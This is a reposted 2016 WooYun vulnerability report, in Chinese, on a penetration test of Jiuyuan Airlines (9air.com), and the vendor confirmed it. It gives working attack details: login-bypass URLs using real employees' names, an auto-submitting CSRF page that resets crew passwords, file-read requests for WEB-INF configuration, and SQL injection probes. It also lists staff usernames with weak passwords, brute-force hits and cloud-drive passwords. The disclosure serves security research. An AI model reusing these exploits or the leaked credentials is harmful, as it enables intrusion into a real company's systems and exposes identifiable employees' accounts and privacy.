一次对九元航空的渗透测试

admin
admin
admin
139580
文章
114
评论
2017年4月30日05:40:05评论976 views字数 220阅读0分44秒阅读模式
摘要

2016-05-05: 细节已通知厂商并且等待厂商处理中
2016-05-05: 厂商已经确认,细节仅向厂商公开
2016-05-15: 细节向核心白帽子及相关领域专家公开
2016-05-25: 细节向普通白帽子公开
2016-06-04: 细节向实习白帽子公开
2016-06-19: 细节向公众公开

漏洞概要 关注数(19) 关注此漏洞

缺陷编号: WooYun-2016-205283

漏洞标题: 一次对九元航空的渗透测试

相关厂商: 9air.com

漏洞作者: harbour_bin

提交时间: 2016-05-05 14:40

公开时间: 2016-06-19 15:50

漏洞类型: 设计缺陷/逻辑错误

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 敏感接口缺乏校验 设计不当

4人收藏

漏洞详情

披露状态:

2016-05-05: 细节已通知厂商并且等待厂商处理中
2016-05-05: 厂商已经确认,细节仅向厂商公开
2016-05-15: 细节向核心白帽子及相关领域专家公开
2016-05-25: 细节向普通白帽子公开
2016-06-04: 细节向实习白帽子公开
2016-06-19: 细节向公众公开

简要描述:

看到九元航空在乌云上注册了, 就测试一下

详细说明:

#1 邮箱信息收集+泄漏密码采集, 获取一下邮箱帐号

http://mail.9air.com/

code 区域 
 9air.com
  9air.com
  9air.com
  9air.com
  9air.com
  9air.com
  9air.com
  9air.com
  9air.com
  9air.com
  9air.com
  9air.com
  9air.com
  9air.com
  9air.com
  9air.com
  9air.com
  9air.com
  9air.com
  9air.com
  9air.com
  9air.com
  9air.com
  9air.com
  9air.com
  9air.com
  9air.com
  9air.com
  9air.com
  9air.com
  9air.com
  9air.com
  9air.com
  9air.com
  jyh9air.com
  8air.com
  8air.com
  8air.com
  8air.com
  8air.com
  8air.com
  9air.com2015
  9air.com2015
  9air.com2015

泄漏敏感文件、通讯录、内网信息和监控信息等

一次对九元航空的渗透测试

#2 业务逻辑

code 区域 
http://sms.9air.com/oa!aircrewLogin?username=DingJun&airuser.aircrewName=丁军&airuser.aircrewDepartment.aircrewDeptCode=CW05&dutycode=A
 直接进去了
 分析后, 发现username、airuser.aircrewName、airuser.aircrewDepartment.aircrewDeptCode三个正确就可以进去了
 实例1: 
 http://sms.9air.com/oa!aircrewLogin?username=sms&airuser.aircrewName=SMS&airuser.aircrewDepartment.aircrewDeptCode=CW05&dutycode=A
 实例2:
 http://sms.9air.com/oa!aircrewLogin?username=gaoweixing&airuser.aircrewName=高卫星&airuser.aircrewDepartment.aircrewDeptCode=CW05&dutycode=A

SMS

一次对九元航空的渗透测试

一次对九元航空的渗透测试

高卫星

一次对九元航空的渗透测试

crew系统修改密码处

code 区域 
http://crew.9air.com/personal_change_password.jsp
code 区域 
<!doctype html>
 <html lang="en">
 <head>
   <meta charset="UTF-8">
   <meta name="Generator" content="EditPlus®">
   <meta name="Author" content="">
   <meta name="Keywords" content="">
   <meta name="Description" content="">
   <title>Document</title>
 </head>
 <body>
     <form method="post" action="http://crew.9air.com/personal_change_password.jsp" id="edit">
         <input name="newPass" type="text" value="9air.com1">
         <input name="validPass" type="text" value="9air.com1">
      </form>
 
 </body>
 
 <script>
         document.getElementById("edit").submit();
 </script>
 </html>

Crew系统, 修改密码处未验证验证原密码, 结合邮箱, 可CSRF实现密码修改

#3 文件读取

code 区域 
sms.9air.com/reqManagement.action?fileName=web.txt&&fileAddr=/WEB-INF/web.xml
 sms.9air.com/reqManagement.action?fileName=web.txt&&fileAddr=/WEB-INF/classes/log4j.properties

一次对九元航空的渗透测试

一次对九元航空的渗透测试

#4 SQL注入

code 区域 
http://oa.9air.com:8081//services/

一次对九元航空的渗透测试

举例

一次对九元航空的渗透测试

1' or 'a'='a 结果为4

1' or 'a'='b 结果为5

用户名长度

一次对九元航空的渗透测试

具体可参考

WooYun: 泛微协同商务系统e-cology某处SQL注入(附验证中转脚本)

WooYun: 泛微OA某接口无需登录可执行任意SQL语句(附脚本)

#5 帐号体系控制不严, 进入多个系统

http://crew.9air.com/

code 区域 
dingjun 9air.com
 zhaohaili
 wangxiong
 lixiaoming
 chenli
 chenhao
 lijinglin
 caoyuanhe
 zhangben
 liuyongqiang
 jiazhenxiu
 lijiayi 888888
 wangren
 liuguangping
 limengkan
 shizhaojin
 fengbo
 jiangchao
 yangsibo
 zhuxingyan
 songyuan
 yangxiangdong
 wangqi
 wangyao
 wuyuhao
 houfeiyu
 liuyiming
 hudongli
 caoning
 yangjin
 yangyidong
 fuyu
 chenweibin
 caoyuanhe
 yangjian
 chenyupei
 wenxudong
 sunshina
 liujingwen
 zhaoyafang
 yanyu
 zhangxinyu
 cuiyongtao
 qiaozhu
 lijiaming
 zhaodongchen
 hejian
 hanfanliang
 changxiaobo
 xulihao
 fangxiangyun
 maquan
 xiaohaodi
 wangyiran
 lichaoa
 liangshuang
 tianmeng
 liuquan
 huqigang
 yangqining
 heli 8air.com
 gechunlian  abc123456
 liyuzhu 123456
 hejiangtao 123456
 liuyingbing a123456

一次对九元航空的渗透测试

oa.9air.com

举例说明, 还有很多的

code 区域 
高卫星 9air.com
 关锋 9air.com

一次对九元航空的渗透测试

一次对九元航空的渗透测试

http://203.156.207.29:8080/mes/

code 区域 
Payload1 Payload2 Status Length
 niejiangnan aaaa 200 18830
 yanjun 123456 200 15292
 luochihong aaaa 200 8547
 xuweibiao aaaa 200 8350
 huanghe aaaa 200 8344
 yiniansheng aaaa 200 7868
 wangchunhui aaaa 200 1035
 sujianlin aaaa 200 1033
 liusiqi aaaa 200 1031
 xuqinghai aaaa 200 1030

一次对九元航空的渗透测试

#5 外围信息

code 区域 
微云   密码:dingjianchejian
 百度云 ,密码:9air.com;
        ,密码:9air.com

漏洞证明:

已证明!

修复方案:

1、邮箱弱密码不能只是发邮件, 是否可以强制修改

2、业务逻辑部分, 重新设计一下

3、OA的SQL注入问题, 联系泛微吧

4、多个系统账户体系问题, 添加验证码+修改弱口令

5、你们更专业

版权声明:转载请注明来源 harbour_bin@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2016-05-05 15:48

厂商回复:

万恶的弱密码。

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin